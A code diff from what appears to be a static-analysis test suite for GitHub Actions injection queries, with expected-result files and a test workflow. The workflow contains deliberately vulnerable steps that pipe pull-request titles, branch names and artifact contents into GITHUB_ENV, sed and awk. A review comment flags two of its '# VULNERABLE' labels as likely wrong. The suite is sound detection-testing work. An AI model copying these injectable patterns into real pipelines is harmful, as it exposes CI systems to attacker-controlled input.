injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | 
@@ -130,3 +127,5 @@ subpaths | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 23bc7784f76..94e2af8ecaa 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | 
@@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -92,5 +88,8 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 42ba8bf2749..5d841e50dbb 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml 
@@ -13,36 +13,62 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref }} - - run: echo "s/FOO/$TITLE/g" - - run: sed "s/FOO/$TITLE/g" - - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - run: awk "BEGIN {$TITLE}" - - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | + # NOT VULNERABLE + echo "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + sed "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: | + # VULNERABLE + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + - run: | + # VULNERABLE + awk "BEGIN {$TITLE}" + - run: | + # VULNERABLE + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # VULNERABLE sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json - run: | + # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo - - - name: Checkout ref - uses: actions/checkout@v4 - with: - ref: ${{ github.event.pull_request.head.ref }} - - name: Detect new changesets - id: added-files - run: | - delimiter="$(openssl rand -hex 8)" - echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" - echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" - echo "${delimiter}" >> "${GITHUB_OUTPUT}" + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD ) + sed 
"s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD^ | xargs) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # NOT VULNERABLE + echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + - run: | + # NOT VULNERABLE + git log -1 --pretty=%s + - run: | + # NOT VULNERABLE + BODY=$(git log --format=%s) + sed -E 's/\s+/\n/g' <<<"$BODY" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 1e4051fef43..bd0684d1711 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
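Review bot: The `# VULNERABLE` marker on the two multi-line `sed -e 's##${TITLE}#' \` steps looks inaccurate, because `${TITLE}` sits inside single quotes there and the shell would hand it to sed unexpanded, unlike the double-quoted `sed "s/FOO/$TITLE/g"` steps earlier in the hunk. If the marker is meant as "the query is expected to alert here", these two would read better as a known false positive, e.g. `# FALSE POSITIVE: ${TITLE} is single-quoted, so the shell does not expand it`, with a double-quoted multi-`-e` variant added if a true positive for that form is wanted. The markers live inside the `run: |` scalar and so become part of the script text the query reports (the `.expected` labels now start with `# VULNERABLE\n`), which means any rewording requires regenerating both `.expected` files. The `steps:` list this hunk edits begins outside the hunk.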
@@ -1,29 +1,35 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | 
.github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| 
.github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| 
.github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD 
)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. 
